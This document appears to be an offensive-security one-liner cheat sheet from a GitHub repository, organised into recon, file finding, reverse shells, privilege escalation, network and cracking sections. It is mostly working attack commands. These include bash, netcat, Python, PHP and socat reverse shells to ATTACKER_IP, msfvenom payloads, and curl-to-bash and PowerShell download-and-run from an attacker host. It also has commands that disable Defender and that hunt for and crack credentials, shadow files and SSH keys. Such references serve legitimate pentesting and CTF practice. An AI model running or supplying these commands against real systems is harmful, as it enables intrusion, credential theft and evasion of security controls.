// Oneliners

git clone https://github.com/ledksv/oneliners.git

Recon & Enumeration

nmap — full TCP port scan with version detection and default scripts
nmap -sV -sC -p- --min-rate 5000 -oN nmap.txt TARGET
nmap — top 200 UDP ports
nmap -sU --top-ports 200 TARGET
nmap — run the vuln script category
nmap --script=vuln TARGET
nmap — just show open ports
nmap -p- -T4 TARGET | grep open
masscan — full port scan
masscan -p1-65535 TARGET --rate=1000
gobuster — dir scan with extensions
gobuster dir -u http://TARGET -w /usr/share/wordlists/dirb/common.txt -x php,html,txt -t 50 -o gobuster.txt
ffuf — dir scan
ffuf -u http://TARGET/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc 200,301,302
ffuf — vhost fuzzing
ffuf -u http://TARGET -H 'Host: FUZZ.TARGET' -w subdomains.txt -fs 0
curl — clean robots.txt
curl -s http://TARGET/robots.txt | grep -v '#'
curl — check headers
curl -I http://TARGET
whatweb — detect web tech stack
whatweb http://TARGET
nikto — web vulnerability scan
nikto -h http://TARGET -o nikto.txt
enum4linux — full SMB enumeration
enum4linux -a TARGET 2>/dev/null | tee enum4linux.txt
smbmap — SMB share listing
smbmap -H TARGET
smbclient — anonymous SMB shares
smbclient -L //TARGET -N
showmount — NFS exports
showmount -e TARGET
snmpwalk — SNMP walk
snmpwalk -c public -v1 TARGET 2>/dev/null
ldapsearch — anonymous LDAP dump
ldapsearch -x -H ldap://TARGET -b 'dc=domain,dc=com' 2>/dev/null
dig — ANY query for all record types
dig TARGET ANY +noall +answer
dig — attempt a DNS zone transfer (AXFR)
dig axfr @TARGET domain.com
theHarvester — OSINT all sources
theHarvester -d domain.com -b all 2>/dev/null
wpscan — full WordPress scan
wpscan --url http://TARGET -e u,ap,at --plugins-detection aggressive
cewl — generate wordlist from site
cewl http://TARGET -m 5 -w custom_wordlist.txt

File Finding

find SUID binaries
find / -perm -4000 -type f 2>/dev/null
find writable files
find / -writable -type f 2>/dev/null | grep -v proc
find SSH / crypto keys
find / -name id_rsa -o -name '*.pem' -o -name '*.key' 2>/dev/null
find config files
find / -name 'wp-config.php' -o -name 'config.php' -o -name '.env' 2>/dev/null
find configs containing password
find / -name '*.conf' -exec grep -l 'password' {} \; 2>/dev/null
find files modified last 10 mins
find / -mmin -10 -type f 2>/dev/null | grep -v proc
find CTF flags
find / -name 'flag*' -o -name 'user.txt' -o -name 'root.txt' 2>/dev/null
grep passwords in webroot
grep -r 'password' /var/www/html/ 2>/dev/null
search bash history for credentials
cat ~/.bash_history | grep -i 'pass\|ssh\|mysql\|ftp'

Reverse Shells

Listener first: always start the listener before triggering the shell, e.g. nc -lvnp 4444
bash reverse shell
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
bash via -c
bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
netcat mkfifo
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f
netcat -e
nc -e /bin/bash ATTACKER_IP 4444
python3 reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh"])'
PHP reverse shell
php -r '$s=fsockopen("ATTACKER_IP",4444);$proc=proc_open("/bin/sh",array(0=>$s,1=>$s,2=>$s),$pipes);'
socat stable shell
socat TCP:ATTACKER_IP:4444 EXEC:'bash -li',pty,stderr,setsid,sigint,sane
msfvenom — Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf > shell.elf
msfvenom — Windows EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe > shell.exe

Shell Upgrade / Stabilisation

upgrade to PTY (Python)
python3 -c 'import pty;pty.spawn("/bin/bash")'
full TTY stabilisation
# Step 1 — on target
python3 -c 'import pty;pty.spawn("/bin/bash")'

# Step 2 — press Ctrl+Z to background the shell, then on your machine
stty raw -echo; fg

# Step 3 — back in the foregrounded shell
export TERM=xterm
export SHELL=bash

Privilege Escalation — Linux

check sudo permissions
sudo -l
SUID binaries with owner and permission details
find / -perm -4000 -type f 2>/dev/null | xargs ls -la
find capabilities
getcap -r / 2>/dev/null
all cron jobs
cat /etc/crontab && ls -la /etc/cron*
root processes
ps aux | grep root | grep -v grep
listening services (internal)
ss -tulpn | grep LISTEN
kernel and OS version
uname -a && cat /etc/os-release
Docker container detection
cat /proc/1/cgroup | grep -qi docker && echo IN_DOCKER
secrets in environment variables
env | grep -i 'pass\|key\|token\|secret'
writable shell scripts
find / -name '*.sh' -writable 2>/dev/null
run LinPEAS from attacker machine
curl -s http://ATTACKER_IP:8080/linpeas.sh | bash
pspy — monitor processes
wget -q http://ATTACKER_IP:8080/pspy64 -O /tmp/pspy && chmod +x /tmp/pspy && /tmp/pspy

Privilege Escalation — Windows

full user info — privs + groups
whoami /all
users and local admins
net user && net localgroup administrators
OS version and installed hotfixes
systeminfo | findstr /i "os name\|os version\|hotfix"
auto-start services outside C:\Windows — candidates to check for unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
AlwaysInstallElevated check
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2>nul
in-memory PowerShell execution
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')"
download with certutil
certutil -urlcache -f http://ATTACKER_IP/shell.exe C:\Windows\Temp\shell.exe
registry password search
reg query HKLM /f password /t REG_SZ /s 2>nul
disable Defender (requires admin)
powershell -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true"

Network

all local IPv4 addresses
ip a | grep 'inet ' | awk '{print $2}'
non-default routes — directly reachable subnets
ip route | grep -v default
ARP cache — nearby hosts
arp -a | grep -v incomplete
bash ping sweep
for i in $(seq 1 254); do (ping -c1 -W1 192.168.1.$i >/dev/null && echo 192.168.1.$i) & done; wait
bash TCP port check — selected common ports
for p in 21 22 23 25 53 80 443 445 3306 3389 8080; do (echo >/dev/tcp/TARGET/$p) 2>/dev/null && echo $p open; done
tcpdump — capture port 80 traffic and print payload as ASCII
tcpdump -i eth0 port 80 -A
tcpdump — capture SMB to file
tcpdump -i eth0 'port 445 or port 139' -w smb.pcap

File Transfer

serve files — Python HTTP server
python3 -m http.server 8080
download — wget
wget http://ATTACKER_IP:8080/file -O /tmp/file
download — curl
curl http://ATTACKER_IP:8080/file -o /tmp/file
upload via SCP
scp file.txt user@TARGET:/tmp/
receive file with netcat
# Receiver (target):
nc -lvnp 4444 > received_file

# Sender (attacker):
nc TARGET 4444 < file_to_send
encode file to base64
base64 -w 0 file.sh
decode base64 to file
echo 'BASE64STRING' | base64 -d > file.sh

Hash & Cracking

hash a string — MD5
echo -n 'password' | md5sum
hash a string — SHA256
echo -n 'password' | sha256sum
identify hash type
hash-identifier 'HASH_VALUE'
hashcat — crack MD5 (-m 0)
hashcat -m 0 hash.txt rockyou.txt --force
hashcat — crack NTLM (-m 1000)
hashcat -m 1000 hash.txt rockyou.txt --force
hashcat — SHA512crypt (-m 1800)
hashcat -m 1800 hash.txt rockyou.txt --force
hashcat — Kerberoast (-m 13100)
hashcat -m 13100 kerb.txt rockyou.txt --force
hashcat — AS-REP roast (-m 18200)
hashcat -m 18200 asrep.txt rockyou.txt --force
john — wordlist crack
john --wordlist=rockyou.txt hash.txt
john — crack /etc/shadow hashes (merged with unshadow)
unshadow /etc/passwd /etc/shadow > combined.txt && john combined.txt --wordlist=rockyou.txt
john — crack SSH key
ssh2john id_rsa > id_rsa.hash && john id_rsa.hash --wordlist=rockyou.txt
Common Hashcat Modes: 0 = MD5 · 100 = SHA1 · 1000 = NTLM · 1400 = SHA256 · 1800 = SHA512crypt · 3200 = bcrypt · 5500 = NTLMv1 · 5600 = NTLMv2 · 13100 = Kerberoast · 18200 = AS-REP